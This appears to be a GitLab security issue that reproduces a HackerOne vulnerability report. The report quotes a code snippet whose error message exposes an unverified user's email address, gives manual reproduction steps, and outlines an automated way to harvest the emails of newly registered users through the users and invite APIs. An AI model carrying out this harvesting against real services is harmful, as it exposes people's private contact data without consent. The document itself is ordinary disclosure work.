Leaking emails of newly created users
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1884672 by shells3c
on 2023-02-23, assigned to @fvpotvin:
Report
Summary
A Gitlab error message leaks user's email address in ee/app/models/ee/member.rb:
def email_not_verified
_("email '%{email}' is not a verified email." % { email: user.email })
end
The error message only appears when you invite an unverified user to the group that restricts membership by email domain, which means only users who haven't verified their email are affected by this vulnerability, very unlikely to happen as users have to verify their email addresses to can log in. However, a possible attack scenario here is that the attack happens in between the sign-up and the confirmation, which I think usually only lasts some minutes. But it's exploitable because GitLab allows you to fetch latest users (by creation time), just a simple API query is enough to do this: GET /api/v4/users
. So the script here is that the attacker automatically and continuously fetches new users from the API, feeds it to the Invite member API and collects the emails from error messages.
Steps to reproduce
Note: You will need a Gitlab Enterprise server or a Premium Plan on gitlab.com (you can sign-up for a trial)
- Create a new user and don't confirm the email yet, remember the username
- Create a group, go to Settings > General > Restrict membership by email domain and add a random domain that doesn't exist
- Now go to Group information > Members, click Invite members and enter the username from step 1
- After clicking Invite, an error message will be returned with the email address
Steps to reproduce the real-life attack scenario (on gitlab.com):
- After creating a Premium group, go to Group information > Members, click Invite members
- Click the input box under Username or email address, after a few seconds of loading, a list of suggested users will appear, choose the user on top of them
- Click Invite and you will have a chance of revealing that user's email
- If
The member's email address is not allowed for this group
is the only error message you get, try again and after several failed attempts, you will get at least one successful attempt
Output of checks
This bug happens on GitLab.com
Impact
Collecting email addresses from Gitlab
How To Reproduce
Please add reproducibility information to this section: